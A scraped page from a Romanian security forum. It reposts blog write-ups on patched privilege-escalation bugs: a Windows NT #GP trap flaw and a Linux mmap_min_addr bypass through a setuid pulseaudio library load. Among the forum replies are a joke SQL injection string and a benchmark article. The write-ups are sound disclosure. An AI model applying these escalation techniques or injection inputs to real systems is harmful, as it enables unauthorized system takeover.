STATUS_ACCESS_DENIED. The bug we're talking about today involves how BIOS service calls are handled, which are a low level way of interacting with the system that's needed to support real-mode programs. The kernel implements BIOS service calls in two stages, the second stage begins when the interrupt handler for general protection faults (often shortened to #GP in technical documents) detects that the system has completed the first stage. The details of how BIOS service calls are implemented are unimportant, what is important is that the two stages must be perfectly synchronised, if the kernel transitions to the second stage incorrectly, a hostile user can take advantage of this confusion to take control of the kernel and compromise the system. In theory, this shouldn't be a problem, Microsoft implemented a check that verifies that the trap occurred at a magic address (actually, a cs:eip pair) that unprivileged users can't reach. The check seems reasonable at first, the hardware guarantees that unprivileged code can't arbitrarily make itself more privileged without a special request, and even if it could, only authorised programs are permitted to use NtVdmControl() anyway. Unfortunately, it turns out these assumptions were wrong. The problem I noticed was that although unprivileged code cannot make itself more privileged arbitrarily, Virtual-8086 mode makes testing the privilege level of code more difficult because the segment registers lose their special meaning. This is because In protected mode, the segment registers (particularly ss and cs) can be used to test privilege level, however in Virtual-8086 mode they're used to create far pointers, which allow 16-bit programs to access the 20-bit real address space. However, I still couldn't abuse this fact because NtVdmControl() can only be accessed by authorised programs, and there's no other way to request pathological operation on Virtual-8086 mode tasks. I was able to solve this problem by invoking the real NTVDM subsystem, and then loading my own code inside it using a combination of CreateRemoteThread(), VirtualAllocEx() and WriteProcessMemory(). Finally, I needed to find a way to force the kernel to transition to the vulnerable code while my process appeared to be privileged. My solution to this was to make the kernel fault when returning to user mode from kernel mode, thus creating the appearance of a legitimate trap for the fabricated execution context that I had installed. These steps all fit together perfectly, and can be used to convince the kernel to execute my code, giving me complete control of the system. Conclusion Could Microsoft have avoided this issue? It's difficult to imagine how, errors like this will generally elude fuzz testing (In order to observe any problem, a fuzzer would need to guess a 46-bit magic number, as well as setup an intricate process state, not to mention the VdmAllowed flag), and any static analysis would need an incredibly accurate model of the Intel architecture. The code itself was probably resistant to manual audit, it's remained fairly static throughout the history of NT, and is likely considered forgotten lore even inside Microsoft. In cases like this, security researchers are sometimes in a better position than those with the benefit of documentation and source code, all abstraction is stripped away and we can study what remains without being tainted by how documentation claims something is supposed to work. If you want to mitigate future problems like this, reducing attack surface is always the key to security. In this particular case, you can use group policy to disable support for Application Compatibility (see the Application Compatability policy template) which will prevent unprivileged users from accessing NtVdmControl(), certainly a wise move if your users don't need MS-DOS or Windows 3.1 applications. Posted by Julien Tinnes at 7:48 AM Sursa: cr0 blog: CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
  7. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h]Friday, June 26, 2009 EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel. EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable. EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895 NULL pointers dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy. This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitely use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail). Kernel developpers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross architectures) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible. Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as: using brk() creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region obscure system calls such as remap_file_pages putting memory pressure in the address space to let the kernel allocate in this region using the MAP_PAGE_ZERO personality All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel): if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO)) return -EACCES; return 0; Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability ? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back ? Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load though its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection. Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask. PS: Thanks to Robert Swiecki for some help while investigating this. Posted by Julien Tinnes at 11:37 AM Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
  8. [h=3]Local bypass of Linux ASLR through /proc information leaks[/h]Wednesday, April 22, 2009 EDIT2: Thanks to the efforts of Jake Edge who noticed our presentation, /proc/pid/stat information leak is now at least partially patched in mainline kernel, since 2.6.27.23 EDIT1: This is featured in an LWN article by Jake Edge Tavis Ormandy and myself talked about locally bypassing address space layout randomization (ASLR) in Linux in a lightning talk at CanSecWest. From Linux 2.6.12 to Linux 2.6.21, you could completely bypass ASLR when targeting local processes by reading /proc/pid/maps. Since Linux 2.6.22, if you cannot ptrace "pid", then you will see an empty /proc/pid/maps. It has been known for at least 7 years now that /proc/pid/stat and /proc/pid/wchan could also leak sensitive information. Reading this information has been prevented in GRSecurity since the beginning as well as in this patch. The question was: could you exploit this information to bypass ASLR in practice? If you want to find out, it's easy: we've just published the slides and Tavis' tool! Posted by Julien Tinnes at 4:21 PM Sursa: cr0 blog: Local bypass of Linux ASLR through /proc information leaks
  9. [h=3]History of memory corruption vulnerabilities and exploits[/h] I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of flaws in common software is still much too high. Consider what’s required to compromise today’s most hardened consumer platforms, iOS and Chrome. You need a flaw in the default install that is useful and remotely accessible, memory disclosure bug, sandbox bypass (or multiple ones), and often a kernel or other privilege escalation flaw. Given a sufficiently small trusted computing base, it should be impossible to find this confluence of flaws. We clearly have too large a TCB today since this combination of flaws has been found not once, but multiple times in these hardened products. Other products that haven’t been hardened require even less flaws to compromise, making them more vulnerable even if they have the same rate of bug occurrence. The paper’s conclusion shows that if you want to prevent exploitation, your priority should be preventing stack, heap, and integer overflows (in that order). Stack overflows are by far still the most commonly exploited class of memory corruption flaws, out of proportion to their prevalence. We’re clearly not smart enough as a species to stop creating software bugs. It takes a Dan Bernstein to reason accurately about software in bite-sized chunks such as in qmail. It’s important to face this fact and make fundamental changes to process and architecture that will make the next 18 years better than the last. Download: http://www.isg.rhul.ac.uk/sullivan/pubs/raid-2012.pdf Sursa: History of memory corruption vulnerabilities and exploits | root labs rdist
  10. Am gasit un "bridge" intre Wordpress si vBulletin, insa nu merge pe aceasta versiune. Mai exact, crapa tot blog-ul. Voi incerca sa fac eu ceva "manual" pentru comentarii, insa nu stiu cand. Deocamdata lasam asa, sa vedem ce iese.
  11. Nytro

    intrebare

    ' or username=NUMELE_TAU_REAL/**/and/**/aDDreSS=ADRESA_TA_DE_ACASA Inlocuiesti ce e cu majuscule cu datele tale reale.
  12. 1. 6 (1 + 2 + 3) 2. RSTRSTRSTRST (cand b ajunge 0) 3. Hello world (format de compatibilitate cu tastaturile "vechi" adica antice) 4. Nu ai "using namespace std;". Invalid lvalue... ? 5. RST 6. Acum este ora 4 noaptea! Sa fac un challenge pe RST 7. 9 (2 + 3 + 4) 8. exit(0), RST (nu se mai compileaza deci nu mai afiseaza nimic) Plm
  13. Da, de acea pagina am avea nevoie, de un design pentru ea.
  14. Legat de istorie, sunt foarte putini persoane pe care o cunosc, care activeaza de cel putin 5-6 ani. Daca tot veni vorba, se ofera cineva sa faca un homepage? Doar de design avem nevoie, de integrare ma voi ocupa eu.
  15. Da, m-am gandit la asta. Cand voi avea timp liber voi scrie un articol mai detaliat, sper doar sa am timp...
  16. Salut, Pentru a completa forumul am decis sa deschidem un blog: https://rstforums.com/blog/ Blog-ul are doar rol informativ, va contine anunturi administrative, mici articole in limba romana si multe altele. Mai multe informatii: https://rstforums.com/blog/2013/03/23/blog-ul-rst/ Pe blog vor posta doar membrii din staff. Daca aveti ceva frumos care considerati ca se poate posta, luati legatura cu cineva din staff. Daca sunt probleme sau daca aveti sugestii le asteptam cu placere aici. // RST
  17. Nytro

    Salut

    La revedere.
  18. Nu te risca, sunt multi tepari. Nu am incercat si nici nu voi incerca, dar aia sunt ratatii care copiau exploit-urile altora si spuneau ca sunt ale lor: injector. Daca vrei exploit-uri e simplu: inchiriaza un exploit kit! Si da-mi si mie de veste daca faci asta
  19. Cand suni in alta retea se aude un "bipuit" care te anunta ca "poti fi taxat suplimentar".
  20. www.youtube.com/watch?v=Z1eX1vEgiRQ
  21. Info: Sun? la 544 ?i afl? dac? ai telefonul ascultat: Ofi?erii de la Informa?ii pot fi surprin?i în „flagrant”? Cine le autorizeaz? intercept?rile
  22. Da, parca un joc, parca de la Steam era. Adica nu stiu daca avea treaba cu OpenGL, parca nu OpenGL optimizasera ci acel joc...
  23. Link "permanent" (cod sursa): https://rstforums.com/proiecte/DK_v3.3.zip Voi proceda la fel pentru cat mai multe proiecte.
  24. [h=1]Windows 8 Outperforming Ubuntu Linux With Intel OpenGL Graphics[/h] Published on March 21, 2013 Written by Michael Larabel In our benchmarks of Microsoft Windows 8, we have found that Intel's Windows OpenGL driver is generally superior to that of their open-source Linux graphics driver. Some progress has been made, but in today's testing of an ASUS Ultrabook bearing an Ivy Bridge processor, Linux has a ways to go for some games in matching the Windows binary performance and features. Over the years there have been many Windows 7 vs. Linux benchmarks on Phoronix. Having recently picked up an ASUS Ultrabook for benchmarking, some Windows 8 vs. Ubuntu 13.04 development benchmarks were carried out to see the positioning today. An ASUS S56CA-WH31 was the candidate for this testing, which is a $500 Intel Ultrabook sporting an Intel Core i3 3217U CPU, 4GB of DDR3 system memory, 500GB 5400RPM HDD + 24GB Solid-State Drive, and a 15.6-inch display with 1366 x 768 resolution. The ASUS Ultrabook comes pre-loaded with Microsoft Windows 8. The Intel Core i3 3217U processor provides HD 4000 graphics, two physical cores plus Hyper Threading, 1.8GHz clock frequency, 3MB cache, and is rated at a 17 Watt TDP. All benchmarking in this article between Windows and Linux happened from this ASUS S56CA-WH31 Ultrabook. The stock Intel Windows 8 graphics performance was compared to Ubuntu 13.04 in a variety of cross-platform games using OpenGL where the games are known to have quality/similar ports to Windows and Linux. Benchmarking on both operating systems were all handled via the open-source Phoronix Test Suite software in conjunction with OpenBenchmarking.org. The Ubuntu 13.04 development snapshot used was from mid-March and packaged the Linux 3.8 kernel, Unity 6.6.0, xf86-video-intel 2.21.4, X.Org Server 1.13.2, GCC 4.7.2, and Mesa 9.0.2. For also seeing the very latest state of the Intel OpenGL driver software on Linux, Ubuntu 13.04 was additionally tested when using a Git development snapshot of the Linux 3.9 kernel and then Mesa 9.2-devel Git master from mid-March. This represents the very latest state of the Intel Linux graphics driver. (Ubuntu 13.04 will ship with Mesa 9.1, but that stable release wasn't pulled into the repository at the time of testing and 9.2-devel offers the absolute latest innovations for this open-source driver.) Previous to this article, my latest Windows 7 test articles were: Intel Linux OpenGL Driver Remains Slower Than Windows, NVIDIA Performance: Windows 7 vs. Ubuntu Linux 12.10, and AMD Radeon Catalyst: Windows 7 vs. Ubuntu 12.04 LTS. This testing is quite straightforward and looking namely at the "out of the box" OpenGL gaming performance between Windows 8 and Ubuntu 13.04 for Intel Ivy Bridge graphics. Articol complet: [Phoronix] Windows 8 Outperforming Ubuntu Linux With Intel OpenGL Graphics
×
×
  • Create New...